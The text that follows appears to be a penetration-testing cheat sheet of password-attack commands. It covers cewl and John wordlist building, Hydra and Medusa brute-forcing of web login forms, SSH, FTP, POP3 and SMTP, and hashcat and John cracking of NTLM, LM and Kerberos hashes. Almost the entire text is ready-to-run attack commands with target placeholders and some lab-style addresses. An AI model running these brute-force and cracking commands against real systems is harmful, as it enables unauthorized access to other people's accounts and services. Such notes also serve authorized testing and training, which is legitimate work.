
Cewl
cewl http://<targetip>/ -m 6 -w cewl.txt
wc -l cewl.txt
john --wordlist=cewl.txt --rules --stdout > mutated.txt
wc mutated.txt
medusa -h <targetip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30

-----------------------------------

Hydra

hydra -l root -P /usr/share/wordlısts/rockyou.txt <targetip> ssh
hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt <targetip> -s 22 ssh -V
# Hydra Brute Force
### FTP Brute Force:
```
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V
```
### POP3 Brute Force:
```
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V
```
### SMTP Brute Force:
```
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
```
Use -t to limit concurrent connections, example: -t 15
### Web Login Form:
```
hydra -L /usr/share/wordlists/seclists/Usernames/cirt-default-usernames.txt -P /usr/share/wordlists/rockyou.txt -s 8080 -f 10.129.35.106 http-get /manager/html
```

### SSH:
```
hydra -l root -p admin 192.168.1.105 -t 4 ssh
```

# crack web passwords
http-post-form can change as user module changes
Invalid: what message does the page give for wrong creds
for parameters check with burp

hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <targetip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 

-----------------------------------

Medusa
medusa -h <targetip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10

-----------------------------------

Hashcat

# learn the hash type from hashcat.net example hashes page and pass as its m value
# or you can learn with the following command
hashcat -h | grep -i lm
hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 path/to/hash /opt/rockyou -r rules/InsidePro-PasswordPro.rules
hashcat --user -m 1000 path/to/hash /opt/rockyou -r rules/InsidePro-PasswordPro.rules
hashcat --example-hashes | grep krb
hashcat --example-hashes | less press / and enter krb5asrep - so the mode will be 18200
hashcat -h | grep rep -i

-----------------------------------

LM/NTLM
hashcat -h | grep -i lm 
hashcat -m 3000  hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt

https://hashkiller.co.uk/

------------------------------------------

When you find some digits, check if it's 32 bit
echo -n ....... | wc -c

------------------------------------------
John
john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt 



